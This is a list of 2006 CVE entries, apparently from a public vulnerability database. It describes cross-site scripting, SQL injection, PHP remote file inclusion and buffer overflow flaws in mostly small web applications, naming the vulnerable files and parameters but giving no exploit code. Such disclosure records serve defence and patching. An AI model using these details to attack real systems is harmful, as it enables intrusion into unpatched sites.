[CVE-2006-4562] ** DISPUTED ** The proxy DNS service in Symantec Gateway Security (SGS) allows remote attackers to make arbitrary DNS queries to third-party DNS servers, while hiding the source IP address of the attacker. NOTE: another researcher has stated that the default configuration does not proxy DNS queries received on the external interface.
[CVE-2006-4561] Mozilla Firefox 1.5.0.6 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running.
[CVE-2006-4560] Internet Explorer 6 on Windows XP SP2 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running.
[CVE-2006-4552] Cross-site scripting (XSS) vulnerability in CHXO Feedsplitter 2006-01-21 allows remote attackers to inject arbitrary web script or HTML via the RSS feed.
[CVE-2006-4543] Cross-site scripting (XSS) vulnerability in index.php in HLStats 1.34 allows remote attackers to inject arbitrary web script or HTML via the (1) game parameter in players mode, the (2) weapon parameter in weaponinfo mode, the (3) st parameter in search mode, the (4) action parameter in actioninfo mode, and the (5) map parameter in mapinfo mode.
[CVE-2006-4542] Webmin before 1.296 and Usermin before 1.226 do not properly handle a URL with a null ("%00") character, which allows remote attackers to conduct cross-site scripting (XSS), read CGI program source code, list directories, and possibly execute programs.
[CVE-2006-4540] Cross-site scripting (XSS) vulnerability in learncenter.asp in Learn.com LearnCenter allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2006-4528] Multiple cross-site scripting (XSS) vulnerabilities in membrepass 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) recherche parameter in recherchemembre.php and the (2) email parameter in test.php.
[CVE-2006-4525] Cross-site scripting (XSS) vulnerability in CubeCart 3.0.12 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the links array.
[CVE-2006-4500] Cross-site scripting (XSS) vulnerability in index.php in ezPortal/ztml CMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) about, (2) again, (3) lastname, (4) email, (5) password, (6) album, (7) id, (8) table, (9) desc, (10) doc, (11) mname, (12) max, (13) htpl, (14) pheader, and possibly other parameters.
[CVE-2006-4497] SQL injection vulnerability in comments.php in IwebNegar 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2006-4496] Cross-site scripting (XSS) vulnerability in comments.php in IwebNegar 1.1 allows remote attackers to inject arbitrary web script or HTML via the comment parameter.
[CVE-2006-4487] DUware DUpoll 3.0 and 3.1 stores _private/Dupoll.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and passwords.
[CVE-2006-4483] The cURL extension files (1) ext/curl/interface.c and (2) ext/curl/streams.c in PHP before 5.1.5 permit the CURLOPT_FOLLOWLOCATION option when open_basedir or safe_mode is enabled, which allows attackers to perform unauthorized actions, possibly related to the realpath cache.
[CVE-2006-4480] Incomplete blacklist vulnerability in the nk_CSS function in nuked.php in Nuked-Klan 1.7 SP4.3 allows remote attackers to bypass anti-XSS features and inject arbitrary web script or HTML via JavaScript in an attribute value that is not in the blacklist, as demonstrated using the STYLE attribute of a B element.
[CVE-2006-4479] Cross-site scripting (XSS) vulnerability in loginreq2.php in Visual Shapers ezContents 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the subgroupname parameter.
[CVE-2006-4474] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.11 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters in (1) Admin Module Manager, (2) Admin Help, and (3) Search.
[CVE-2006-4460] Cross-site scripting (XSS) vulnerability in PHP iAddressBook before 0.96 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4454] Cross-site scripting (XSS) vulnerability in hlstats.php in HLstats 1.34 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-4453] Cross-site scripting (XSS) vulnerability in PmWiki before 2.1.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "table markups".
[CVE-2006-4452] PHP remote file inclusion vulnerability in security/include/_class.security.php in Web3news 0.95 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the PHPSECURITYADMIN_PATH parameter.
[CVE-2006-4450] usercp_avatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request.
[CVE-2006-4449] Cross-site scripting (XSS) vulnerability in attachment.php in MyBulletinBoard (MyBB) 1.1.7 and possibly other versions allows remote attackers to inject arbitrary web script or HTML via a GIF image that contains URL-encoded Javascript, which is rendered by Internet Explorer.
[CVE-2006-4442] Cross-site scripting (XSS) vulnerability in PHP iAddressBook before 0.95 allows remote attackers to inject arbitrary web script or HTML via the cat_name parameter, related to adding a category (categories field). NOTE: some details are obtained from third party information.
[CVE-2006-4438] Heap-based buffer overflow in SpIDer for Dr.Web Scanner for Linux 4.33, and possibly earlier versions, allows remote attackers to execute arbitrary code via an LHA archive with an extended header that contains a long directory name.
[CVE-2006-4421] Cross-site scripting (XSS) vulnerability in template/default/thanks_comment.php in Yet Another PHP Image Gallery (YaPIG) 0.95b allows remote attackers to inject arbitrary web script or HTML via the D_REFRESH_URL parameter.
[CVE-2006-4412] WebKit in Apple Mac OS X 10.3.x through 10.3.9 and 10.4 through 10.4.8 allows remote attackers to execute arbitrary code via a crafted HTML file, which accesses previously deallocated objects.
[CVE-2006-4399] User interface inconsistency in Workgroup Manager in Apple Mac OS X 10.4 through 10.4.7 appears to allow administrators to change the authentication type from crypt to ShadowHash passwords for accounts in a NetInfo parent, when such an operation is not actually supported, which could result in less secure password management than intended.
[CVE-2006-4387] Apple Mac OS X 10.4 through 10.4.7, when the administrator clears the "Allow user to administer this computer" checkbox in System Preferences for a user, does not remove the user's account from the appserveradm or appserverusr groups, which still allows the user to manage WebObjects applications.
[CVE-2006-4376] Multiple cross-site scripting (XSS) vulnerabilities in Guder und Koch Netzwerktechnik Eichhorn Portal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly including the (1) profil_nr and (2) sprache parameters in the main portion of the portal, the (3) suchstring field in suchForm in the main portion of the portal, the (4) GaleryKey and (5) Breadcrumbs parameters in the gallerie module, and the (6) GGBNSaction parameter in the ggbns module.
[CVE-2006-4371] Multiple directory traversal vulnerabilities in Alt-N WebAdmin 3.2.3 and 3.2.4 running with MDaemon 9.0.5, and possibly earlier, allow remote authenticated global administrators to read arbitrary files via a .. (dot dot) in the file parameter to (1) logfile_view.wdm and (2) configfile_view.wdm.
[CVE-2006-4370] Alt-N WebAdmin 3.2.3 and 3.2.4 running with MDaemon 9.0.5, and possibly earlier, allow remote authenticated domain administrators to change a global administrator's password and gain privileges via the userlist.wdm file.
[CVE-2006-4362] Cross-site scripting (XSS) vulnerability in getad.php in Diesel Paid Mail allows remote attackers to inject arbitrary web script or HTML via the ps parameter.
[CVE-2006-4361] Multiple cross-site scripting (XSS) vulnerabilities in jobseekers/forgot.php in Diesel Job Site allow remote attackers to inject arbitrary web script or HTML via the (1) uname or (2) SEmail parameters.
[CVE-2006-4360] Cross-site scripting (XSS) vulnerability in E-commerce 4.7 for Drupal before file.module 1.37.2.4 (20060812) allows remote authenticated users with the "create products" permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4358] Cross-site scripting (XSS) vulnerability in index.php in Diesel Pay allows remote attackers to inject arbitrary web script or HTML via the read parameter.
[CVE-2006-4355] Cross-site scripting (XSS) vulnerability in Drupal Easylinks Module (easylinks.module) 4.7 before 1.5.2.1 2006/08/19 12:02:27 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4351] Cross-site scripting (XSS) vulnerability in index.php in OneOrZero 1.6.4.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2006-4327] Multiple cross-site scripting (XSS) vulnerabilities in add_url.php in CloudNine Interactive Links Manager 2006-06-12 allow remote attackers to inject arbitrary web script or HTML via the (1) title, (2) description, or (3) keywords parameters.
[CVE-2006-4325] Cross-site scripting (XSS) vulnerability in gbook.php in Doika guestbook 2.5, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-4324] Cross-site scripting (XSS) vulnerability in add_url2.php in CityForFree indexcity 1.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2006-4317] Cross-site scripting (XSS) vulnerability in attachment.php in WoltLab Burning Board (WBB) 2.3.5 allows remote attackers to inject arbitrary web script or HTML via a GIF image that contains URL-encoded Javascript.
[CVE-2006-4305] Buffer overflow in SAP DB and MaxDB before 7.6.00.30 allows remote attackers to execute arbitrary code via a long database name when connecting via a WebDBM client.
[CVE-2006-4302] The Java Plug-in J2SE 1.3.0_02 through 5.0 Update 5, and Java Web Start 1.0 through 1.2 and J2SE 1.4.2 through 5.0 Update 5, allows remote attackers to exploit vulnerabilities by specifying a JRE version that contains vulnerabilities.
[CVE-2006-4299] Cross-site scripting (XSS) vulnerability in tiki-searchindex.php in TikiWiki 1.9.4 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-4295] Cross-site scripting (XSS) vulnerability in ascan_6.asp in Panda ActiveScan 5.53.00 allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2006-4293] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 10 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter in dohtaccess.html, or the (2) file parameter in (a) editit.html or (b) showfile.html.
[CVE-2006-4273] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin 3.5.4 and 3.6.0 allows remote attackers to inject arbitrary web script or HTML by uploading an attachment with a .pdf extension that contains JavaScript, which is processed as script by Microsoft Internet Explorer 6.
[CVE-2006-4268] Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) file, (2) x, and (3) y parameters in (a) admin/filemanager/preview.php
[CVE-2006-4259] Cross-site scripting (XSS) vulnerability in index.php in Fotopholder 1.8 allows remote attackers to inject arbitrary web script or HTML via the path parameter. NOTE: this might be resultant from a directory traversal vulnerability.
[CVE-2006-4256] index.php in Horde Application Framework before 3.1.2 allows remote attackers to include web pages from other sites, which could be useful for phishing attacks, via a URL in the url parameter, aka "cross-site referencing." NOTE: some sources have referred to this issue as XSS, but it is different than classic XSS.
[CVE-2006-4255] Cross-site scripting (XSS) vulnerability in horde/imp/search.php in Horde IMP H3 before 4.1.3 allows remote attackers to include arbitrary web script or HTML via multiple unspecified vectors related to folder names, as injected into the vfolder_label form field in the IMP search screen.
[CVE-2006-4238] SQL injection vulnerability in torrents.php in WebTorrent (WTcom) 0.2.4 and earlier allows remote attackers to execute arbitrary SQL commands via the cat parameter in category mode.
[CVE-2006-4230] Multiple PHP remote file inclusion vulnerabilities in index.php in Lizge V.20 Web Portal allow remote attackers to execute arbitrary PHP code via a URL in the (1) lizge or (2) bade parameters.
[CVE-2006-4228] Symantec Veritas NetBackup PureDisk Remote Office Edition 6.0 before MP1 20060816 allows remote attackers to bypass authentication and gain privileges via unknown attack vectors in the management interface.
[CVE-2006-4224] Cross-site scripting (XSS) vulnerability in calendar.php in Virtual War (VWar) 1.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the year parameter. NOTE: The page parameter vector is covered by CVE-2006-4009.
[CVE-2006-4223] IBM WebSphere Application Server (WAS) before 6.0.2.13 allows context-dependent attackers to obtain sensitive information via unspecified vectors related to "JSP source code exposure" (PK23475), which occurs when ibm-web-ext.xmi sets fileServingEnabled to true or ExtendedDocumentRoot is used to place a JSP outside a WAR file.
[CVE-2006-4222] Multiple unspecified vulnerabilities in IBM WebSphere Application Server before 6.0.2.13 have unspecified vectors and impact, including (1) an "authority problem" in ThreadIdentitySupport as identified by PK25199, and "Potential security exposure" issues as identified by (2) PK22747, (3) PK24334, (4) PK25740, and (5) PK26123.
[CVE-2006-4220] Multiple cross-site scripting (XSS) vulnerabilities in webacc in Novell GroupWise WebAccess before 7 Support Pack 3 Public Beta allow remote attackers to inject arbitrary web script or HTML via the (1) User.html, (2) Error, (3) User.Theme.index, and (4) User.lang parameters.
[CVE-2006-4217] PHP remote file inclusion vulnerability in modules/usersonline/users.php in WEBInsta CMS 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the module_dir parameter, a different vulnerability than CVE-2006-4196. NOTE: the provenance of this information is unknown.
[CVE-2006-4211] Cross-site scripting (XSS) vulnerability in b0zz and Chris Vincent Owl Intranet Engine 0.90 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4209] PHP remote file inclusion vulnerability in install3.php in WEBInsta Mailing List Manager 1.3e allows remote attackers to execute arbitrary PHP code via a URL in the cabsolute_path parameter.
[CVE-2006-4206] Cross-site scripting (XSS) vulnerability in calendar.asp in ASPPlayground.NET Forum Advanced Edition 2.4.5 Unicode allows remote attackers to inject arbitrary web script or HTML via the calendarID parameter.
[CVE-2006-4205] Multiple PHP remote file inclusion vulnerabilities in WebDynamite ProjectButler 0.8.4 allow remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter to /classes/ scripts including (1) Cache.class.php, (2) Customer.class.php, (3) Performance.class.php, (4) Project.class.php, (5) Representative.class.php, (6) User.class.php, or (7) common.php.
[CVE-2006-4200] Unspecified vulnerability in 04WebServer 1.83 and earlier allows remote attackers to bypass user authentication via unspecified vectors related to request processing.
[CVE-2006-4199] Cross-site scripting (XSS) vulnerability in Soft3304 04WebServer 1.83 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly sanitized before it is returned in an error page, a different vulnerability than CVE-2004-1512.
[CVE-2006-4196] PHP remote file inclusion vulnerability in index.php in WEBInsta CMS 0.3.1 and possibly earlier allows remote attackers to execute arbitrary PHP code via a URL in the templates_dir parameter.
[CVE-2006-4166] PHP remote file inclusion vulnerability in TinyWebGallery 1.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the image parameter to (1) image.php or (2) image.php2.
[CVE-2006-4165] Cross-site scripting (XSS) vulnerability in NetCommons 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4163] ** DISPUTED ** PHP remote file inclusion vulnerability in cls_fast_template.php in myWebland miniBloggie 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the fname parameter. NOTE: another researcher was unable to find a way to execute code after including it via a URL. CVE analysis as of 20060816 was inconclusive.
[CVE-2006-4162] Cross-site scripting (XSS) vulnerability in Dragonfly CMS 9.0.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search field.
[CVE-2006-4157] Cross-site scripting (XSS) vulnerability in index.php in Yet another Bulletin Board (YaBB) allows remote attackers to inject arbitrary web script or HTML via the categories parameter.
[CVE-2006-4137] IBM WebSphere Application Server before 6.1.0.1 allows attackers to obtain sensitive information via unspecified vectors related to (1) the log file, (2) "script generated syntax on wsadmin command line," and (3) traces.
[CVE-2006-4136] Multiple unspecified vulnerabilities in IBM WebSphere Application Server before 6.1.0.1 have unspecified impact and attack vectors involving (1) "SOAP requests and responses", (2) mbean, (3) ThreadIdentitySupport, and possibly others.
[CVE-2006-4129] PHP remote file inclusion vulnerability in admin.webring.docs.php in the Webring Component (com_webring) 1.0 and earlier for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the component_dir parameter.
[CVE-2006-4120] Cross-site scripting (XSS) vulnerability in the Recipe module (recipe.module) before 1.54 for Drupal 4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4113] PHP remote file inclusion vulnerability in genpage-cgi.php in Brian Fraval hitweb 4.2 and possibly earlier versions allows remote attackers to execute arbitrary PHP code via the REP_INC parameter.
[CVE-2006-4109] Cross-site scripting (XSS) vulnerability in Bibliography (biblio.module) 4.6 before revision 1.1.1.1.4.11 and 4.7 before revision 1.13.2.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4106] Cross-site scripting (XSS) vulnerability in blursoft blur6ex 0.3 allows remote attackers to inject arbitrary web script or HTML via a comment title.
[CVE-2006-4105] Cross-site scripting (XSS) vulnerability in Fill Threads Database (FTD) 3.7.3 allows remote attackers to inject arbitrary web script or HTML via the (1) search field or (2) an e-mail message.
[CVE-2006-4104] Cross-site scripting (XSS) vulnerability in admin.cgi in mojoscripts.com mojoGallery allows remote attackers to inject arbitrary web script or HTML via "password input."
[CVE-2006-4102] PHP remote file inclusion vulnerability in tpl.inc.php in Falko Timme and Till Brehm SQLiteWebAdmin 0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the conf[classpath] parameter.
[CVE-2006-4092] Simpliciti Locked Browser does not properly limit a user's actions to ones within the intended Internet Explorer environment, which allows local users to perform unauthorized actions by visiting a web site that executes a JavaScript window.blur loop to remove focus from the browser window, then pressing CTRL-SHIFT-ESC to invoke the Task Manager.
[CVE-2006-4091] Multiple cross-site scripting (XSS) vulnerabilities in Archangel Management Archangel Weblog 0.90.02 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Comment section.
[CVE-2006-4090] Cross-site scripting (XSS) vulnerability in Webligo BlogHoster 2.2 allows remote attackers to inject arbitrary web script or HTML via the "From: part of the comment post," probably involving the nickname parameter to previewcomment.php.
[CVE-2006-4089] Multiple buffer overflows in Andy Lo-A-Foe AlsaPlayer 0.99.76 and earlier allow remote attackers to cause a denial of service (application crash), or have other unknown impact, via (1) a long Location field sent by a web server, which triggers an overflow in the reconnect function in reader/http/http.c
[CVE-2006-4088] Multiple cross-site scripting (XSS) vulnerabilities in CivicSpace 0.8.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Subject, (2) Comment, and (3) Add new comment sections.
[CVE-2006-4087] Cross-site scripting (XSS) vulnerability in admin.cgi in mojoscripts.com mojoGallery allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-4086] Cross-site scripting (XSS) vulnerability in index.php in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-4083] PHP remote file inclusion vulnerability in viewevent.php in myWebland myEvent 1.x allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter, a different vector than CVE-2006-4040. NOTE: the provenance of this information is unknown.
[CVE-2006-4079] Cross-site scripting (XSS) vulnerability in newpost.php in DeluxeBB 1.08, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the subject parameter (aka the topic title field).
[CVE-2006-4077] PHP remote file inclusion vulnerability in CheckUpload.php in Vincenzo Valvano Comet WebFileManager (CWFM) 0.9.1, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the Language parameter.
[CVE-2006-4069] Multiple cross-site scripting (XSS) vulnerabilities in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) m and (2) c parameters in index.php, (3) a search action, and (4) a "submit comment" action.
[CVE-2006-4067] Cross-site scripting (XSS) vulnerability in cake/libs/error.php in CakePHP before 1.1.7.3363 allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected back in a 404 ("Not Found") error page. NOTE: some of these details are obtained from third party information.
[CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue.
[CVE-2006-4058] Cross-site scripting (XSS) vulnerability in archive.php in Simplog 0.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyw parameter when performing a search. NOTE: some details are obtained from third party information.
[CVE-2006-4052] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools PHP Simple Shop 2.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) admin/index.php, (2) admin/adminindex.php, (3) admin/adminglobal.php, (4) admin/login.php, (5) admin/menu.php or (6) admin/header.php.
[CVE-2006-4051] PHP remote file inclusion vulnerability in global.php in Turnkey Web Tools PHP Live Helper 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter.
[CVE-2006-4043] index.php in myWebland myBloggie 2.1.4 and earlier allows remote attackers to obtain sensitive information via a query that only specifies the viewdate mode, which reveals the table prefix in a SQL error message.
[CVE-2006-4042] Multiple SQL injection vulnerabilities in trackback.php in myWebland myBloggie 2.1.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) title, (2) url, (3) excerpt, or (4) blog_name parameters.
[CVE-2006-4040] PHP remote file inclusion vulnerability in myevent.php in myWebland myEvent 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter.
[CVE-2006-4038] Multiple cross-site scripting (XSS) vulnerabilities in eintragen.php in GaesteChaos 0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gastname or (2) gastwohnort parameters.
[CVE-2006-4017] Cross-site scripting (XSS) vulnerability in the search module in Inter Network Marketing (INM) CMS G3 allows remote attackers to inject arbitrary web script or HTML via the search_string parameter.
[CVE-2006-4016] Cross-site scripting (XSS) vulnerability in /toendaCMS in toendaCMS stable 1.0.3 and earlier, and unstable 1.1 and earlier, allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2006-4012] Multiple PHP remote file inclusion vulnerabilities in circeOS SaveWeb Portal 3.4 allow remote attackers to execute arbitrary PHP code via a URL in the SITE_Path parameter to (1) poll/poll.php or (2) poll/view_polls.php. NOTE: the menu_dx.php vector is already covered by CVE-2005-2687.
[CVE-2006-4009] Cross-site scripting (XSS) vulnerability in war.php in Virtual War (Vwar) 1.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-4002] Cross-site scripting (XSS) vulnerability in user.module in Drupal 4.6 before 4.6.9, and 4.7 before 4.7.3, allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: portions of these details are obtained from third party information.
[CVE-2006-3977] Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 has unknown impact and remote attack vectors related to "improper processing of outdated WebScan components."
[CVE-2006-3976] Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 allows remote attackers to install arbitrary files.
[CVE-2006-3975] Unspecified vulnerability in CA eTrust Antivirus WebScan allows remote attackers to execute arbitrary code due to "improper bounds checking when processing certain user input."
[CVE-2006-3974] Cross-site scripting (XSS) vulnerability in cgi-bin/admin in 3Com OfficeConnect Secure Router with firmware 1.04-168 allows remote attackers to inject arbitrary web script or HTML via the tk parameter.
[CVE-2006-3971] Cross-site scripting (XSS) vulnerability in visitor/livesupport/chat.php in Scott Weedon Ajax Chat, possibly 0.1, allows remote attackers to inject arbitrary web script or HTML via the userid parameter.
[CVE-2006-3965] Banex PHP MySQL Banner Exchange 2.21 stores lib.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as database usernames and passwords.
[CVE-2006-3958] Multiple unspecified cross-site scripting (XSS) vulnerabilities in Taskjitsu 2.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) the Search Tasks system, or authenticated users via (2) the Edit Task system, (3) the back-end Category Editor system, and (4) "Pages that display task status, email addresses, URL, customer, and project information."
[CVE-2006-3956] Multiple cross-site scripting (XSS) vulnerabilities in contact.php in Advanced Webhost Billing System (AWBS) 2.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) AccountUsername and (3) Message parameters.
[CVE-2006-3953] Cross-site scripting (XSS) vulnerability in usercp.php in MyBB (aka MyBulletinBoard) 1.x allows remote attackers to inject arbitrary web script or HTML via the gallery parameter.
[CVE-2006-3948] Cross-site scripting (XSS) vulnerability in modules.php in PHP-Nuke INP allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2006-3946] WebCore in Apple Mac OS X 10.3.9 and 10.4 through 10.4.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted HTML that triggers a "memory management error" in WebKit, possibly due to a buffer overflow, as originally reported for the KHTMLParser::popOneBlock function in Apple Safari 2.0.4 using Javascript that changes document.body.innerHTML within a DIV tag.
[CVE-2006-3935] system/workplace/views/admin/admin-main.jsp in Alkacon OpenCms before 6.2.2 does not restrict access to administrator functions, which allows remote authenticated users to (1) send broadcast messages to all users (/workplace/broadcast), (2) list all users (/accounts/users), (3) add webusers (/accounts/webusers/new), (4) upload database import and export files (/database/importhttp), (5) upload arbitrary program modules (/modules/modules_import), and (6) read the log file (/workplace/logfileview) by setting the appropriate value for the path parameter in a direct request to admin-main.jsp.
[CVE-2006-3933] Cross-site scripting (XSS) vulnerability in Alkacon OpenCms before 6.2.2 allows remote authenticated users to inject arbitrary web script or HTML via the message body.
[CVE-2006-3929] Cross-site scripting (XSS) vulnerability in the Forms/rpSysAdmin script on the Zyxel Prestige 660H-61 ADSL Router running firmware 3.40(PT.0)b32 allows remote attackers to inject arbitrary web script or HTML via hex-encoded values in the a parameter.
[CVE-2006-3927] Cross-site scripting (XSS) vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc parameter.
[CVE-2006-3924] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos before 1.6.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-3923] Cross-site scripting (XSS) vulnerability in add.php in Fire-Mouse Toplist 1.1 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the Seitenname parameter.
[CVE-2006-3921] Sun Java System Application Server (SJSAS) 7 through 8.1 and Web Server (SJSWS) 6.0 and 6.1 allows remote authenticated users to read files outside of the "document root directory" via a direct request using a UTF-8 encoded URI.
[CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
[CVE-2006-3916] Cross-site scripting (XSS) vulnerability in snews.php in sNews (aka Solucija News) 1.4 allows remote attackers to inject arbitrary web script or HTML via the search_query parameter.
[CVE-2006-3914] Cross-site scripting (XSS) vulnerability in Blackboard Academic Suite 6.2.3.23 allows remote authenticated users to inject arbitrary HTML or web script by bypassing client-side validation through disabling JavaScript when submitting an essay response, which has no server-side validation before being viewed via "View Attempt Details" in the Gradebook.
[CVE-2006-3909] Cross-site scripting (XSS) vulnerability in calendar.php in WWWthreads allows remote attackers to inject arbitrary web script or HTML via the week parameter.
[CVE-2006-3905] SQL injection vulnerability in Webland MyBloggie 2.1.3 allows remote attackers to execute arbitrary SQL commands via the (1) post_id parameter in index.php and (2) search function.
[CVE-2006-3903] CRLF injection vulnerability in (1) index.php and (2) admin.php in myWebland MyBloggie 2.1.3 allows remote attackers to hijack sessions and conduct cross-site scripting (XSS) attacks via a cookie.
[CVE-2006-3902] Cross-site scripting (XSS) vulnerability in index.php in phpFaber TopSites 2.0.9 allows remote attackers to inject arbitrary web script or HTML via the i_cat parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-3900] Cross-site scripting (XSS) vulnerability in guestbook.php in TP-Book 1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2006-3883] Multiple cross-site scripting (XSS) vulnerabilities in Gonafish LinksCaffe 3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the tablewidth parameter in (a) counter.php
[CVE-2006-3881] Cross-site scripting (XSS) vulnerability in Shalwan MusicBox 2.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter in a request for the top-level URI. NOTE: the id parameter in index.php, and the type and show parameters in a top action, are already covered by CVE-2006-1349.
[CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions of the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869.
[CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions of the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression.
[CVE-2006-3848] Cross-site scripting (XSS) vulnerability in CGI wrapper for IP Calculator (IPCalc) 0.40 allows remote attackers to inject arbitrary web script or HTML via the URI (REQUEST_URI environment variable), which is used in the actionurl variable.
[CVE-2006-3842] Cross-site scripting (XSS) vulnerability in Zoho Virtual Office 3.2 Build 3210 allows remote attackers to execute arbitrary web script or HTML via an HTML message.
[CVE-2006-3841] Cross-site scripting (XSS) vulnerability in WebScarab before 20060718-1904, when used with Microsoft Internet Explorer 6 SP2 or Konqueror 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the URL, which is not sanitized before being returned in an error message when WebScarab is not able to access the URL.
[CVE-2006-3831] The Backup selection in Kailash Nadh boastMachine (formerly bMachine) 3.1 and earlier uses predictable filenames for database backups and stores the files under the web root with insufficient access control, which allows remote attackers to obtain sensitive information by downloading a backup file.
